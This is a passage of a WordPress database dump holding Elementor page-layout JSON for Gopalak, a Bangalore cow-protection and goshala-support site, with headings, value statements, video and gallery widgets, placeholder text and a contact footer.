ailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9259,1590,'_elementor_page_assets','a:0:{}'),(9261,1591,'_elementor_edit_mode','builder'),(9262,1591,'_elementor_template_type','wp-page'),(9263,1591,'_elementor_version','3.7.8'),(9264,1591,'_wp_page_template','elementor_canvas'),(9265,1591,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: 